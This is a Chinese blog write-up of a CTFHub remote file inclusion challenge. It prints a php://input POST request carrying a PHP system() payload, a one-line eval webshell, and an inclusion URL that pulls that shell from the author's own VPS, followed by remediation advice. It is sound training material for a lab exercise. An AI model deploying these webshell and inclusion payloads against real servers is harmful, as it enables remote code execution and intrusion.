CTFHub | 远程包含

已于 2023-06-14 23:07:58 修改
阅读量2k 收藏 6
点赞数 2
分类专栏: CTF精进之路 文章标签: 文件包含 CTF web安全
于 2023-06-13 19:00:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/131185746
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

远程包含:

        (无)

网页显示内容

        

        

0x02 解题过程

0x1 方法一:PHP://input

检查网页显示内容,网页源代码显示的和之前的类似,一眼可以看出可能含有文件包含。

        

检查 phpinfo 环境配置信息页面,检查 allow 的两个选项是否开放。可以看到这两个功能都是开放的。

        

使用 burpsuite 抓包工具抓取网页 url 并重放。

        

修改请求数据,与 php://input 题目一样即可,因为两个配置选项都开放了。(注意:在构造 payload 的时候要空行输出)

POST /?file=php://input HTTP/1.1
Host: challenge-71a89f73784a79e9.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 24

<?php system("ls /"); ?>

        

检查 flag 文件夹,发现此题 flag 。

        

0x2 方法二:服务器执行

为了方便管理,在服务器中创建一个 payload 文件夹。

mkdir payload

        

打开 payload 文件夹,并在文件中使用 vim 编辑器编写一个一句话木马。

<?php @eval($_POST[CTFhub]); ?>

        

使用 python 启动 http 服务,用于后续执行远程文件包含。

python3 -m http.server 8000

        

在本地浏览器总访问 shell.txt 文件路径检查一句话木马是否可用,发现可用正常使用。

         

使用蚁剑连接到自己服务器中的 shell.txt 文件。

http://challenge-688a4674920fa2f5.sandbox.ctfhub.com:10800/?file=http://VPS:8000/payload/shell.txt

        

检查网页内容发现此题 flag 。

        

        

0x03 Linux相关命令

命令描述
mkdir创建文件夹
pwd查看当前所在目录
rmdir删除空的目录
:wq  /  :w!表示保存退出  /  表示强制保存退出
:q  /  :q!在 vim 中表示退出  /  表示强制不保存退出,不对文件进行保存

        

        

0x04 远程文件包含

        远程文件包含(Remote File Inclusion,简称RFI)是一种常见的安全漏洞,它可以允许攻击者远程执行恶意代码或获取敏感信息。攻击者可以通过利用应用程序中易受攻击的包含程序来引入远程文件,这些文件通常包含恶意代码或其他危险的操作。如果应用程序没有正确处理和验证用户输入,那么攻击者就可以通过注入恶意代码来利用这个漏洞。

        

修复建议:

[1].检查应用程序中使用的 URL,确保它们只引用已知和可信的文件。可以创建一个 URL 白名单,列出允许应用程序引用的文件和 URL,从而防止攻击者注入恶意代码。

[2].检查应用程序中使用的文件路径,确保它们只引用已知和可信的文件。应该使用绝对路径来引用文件,而避免从用户输入的路径中加载文件。

[3].对于任何可以接受用户输入的地方,开发人员应该对输入进行适当的验证和过滤,以防止攻击者注入恶意代码。

[4].增强应用程序的日志和监控功能,以便及时发现任何异常行为。应该记录所有的访问和操作,并使用实时监控工具来检测任何可疑的活动。这样可以及时发现并防止攻击者利用远程文件包含漏洞。

        

        

0x05 参考文献

[1].khan安全. 本地文件包含 (LFI) 和远程文件包含 (RFI)[EB/OL]. [2023-06-13]. https://zhuanlan.zhihu.com/p/551478879.

[2].bonelee. 文件包含——本地文件包含和远程文件包含 [EB/OL]. [2023-06-13]. https://www.cnblogs.com/bonelee/p/14292794.html.

        

        

0x06 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF工具包.zip
11-20
CTF工具包.zip
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境 0x00 前言 CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。 0x01 搭建环境 使用CTFhub中的环境的前提条件需要在本地搭建docker的环境。 Ubuntu安装Docker如下: 支持版本 Ubuntu Precise 12.04 (LTS) Ubuntu Trusty 14.04 (LTS) Ubuntu Wily 15.10 以上版本之后的所有版本 内核高于3.10 1.获取安装最新版本的Docker wget -qO- https://get.docker.com/ | sh 或者 apt-get update && apt-get install docker.io 2.启动Docker服务 service docker start 3.安装co
文件包含————ctfhub远程包含
qq_45655564的博客
05-29 1802
远程文件包含漏洞 在PHP的配置文件php.ini里将allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。 CTFHUB远程包含 ...
CTFHub远程执行RCE
m0_67392273的博客
03-19 3438
CTFHub远程执行RCE eval执行 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 php://input 远程包含 读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_19839275141
ctfhub 远程包含
qq_52671379的博客
06-14 475
远程包含 题目 php://input php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 always_populate_raw_post_data 潜在需要更少的内存。 enctype=“multipart/form-data” 的时候 php://input
CTFHUB 远程包含
nai_kai的博客
06-19 4817
CTFHUB 远程包含 ctfhub RCE 远程包含 write up 题目信息: “我没有shell,你怎么取flag?” 打开便是一个phpinfo() 用file包含phpinfo是有回显的,所以构造payload : xxx:10080/?file=php://input post <?php system('ls');?> #if (!strpos($_GET["file"], "flag")) #过滤了get方式 ctfhub{34f653c72f8b095914
CTFHub技能书解题笔记-RCE-远程包含
qq_43006864的博客
03-29 1273
直接开题: 打开题目就是源代码。这里进行简单分析: 这里还说了。我没有shell。 源码这里使用的提到了file。 既然是远程文件包含,那我们尝试使用file包含phpinfo 看样子能行 他说没有shell,那我们利用远程文件包含漏洞结合php伪协议自己传入一个。 这里提供利用样例截图。 开始进行测试: 传入phpinfo 成功运行PHPinfo。路线是对的,那就直接命令执行了。 拿到flag,本题结束。重点...
ctfhub-远程包含
m0_65766842的博客
03-02 171
1
CTFHub笔记之技能树RCE:eval执行、文件包含远程包含、php://input、读取源代码
weixin_48799157的博客
03-28 4420
小白一个,如有错误请指正! 一、eval执行 ?cmd=system("ls"); ?cmd=system("ls%20/"); ?cmd=system("cat%20/flag_26396");
CTFHub | 文件包含
尼泊罗河伯的博客
05-16 1016
简单分析网页显示内容中的源代码,可以发现一处代码include $_GET["file"] ,其中 include 语句可以动态地包含用户发送的GET 请求。详细的方法将在后续的内容中进行逐步解释。
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
ctf:CTF评论|网络
04-19
周大福CTF评论|网络
3.18号日报,ctfhubweb,文件上传漏洞题目解法
最新发布
03-18
文件上传漏洞
CtfHub-wp(web
01-23
ctfhub平台web篇wp
ctfhub RCE
2202_75317918的博客
01-27 729
ctfhub rce
CTFHub】RCE文件包含
m0_63563528的博客
02-03 583
文件包含漏洞的原理及利用、PHP伪协议
CTFHUB RCE——文件包含
winofkill的博客
12-11 5966
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 764
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 882
文件包含,伪协议
ctfhub请求申请
10-09
要申请CTFHub,你可以按照以下步骤进行: 1. 访问CTFHub官方网站(https://www.ctfhub.com/)。 2. 点击网站上的注册按钮,进入注册页面。 3. 在注册页面填写所需的个人信息,包括用户名、密码和电子邮件地址。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值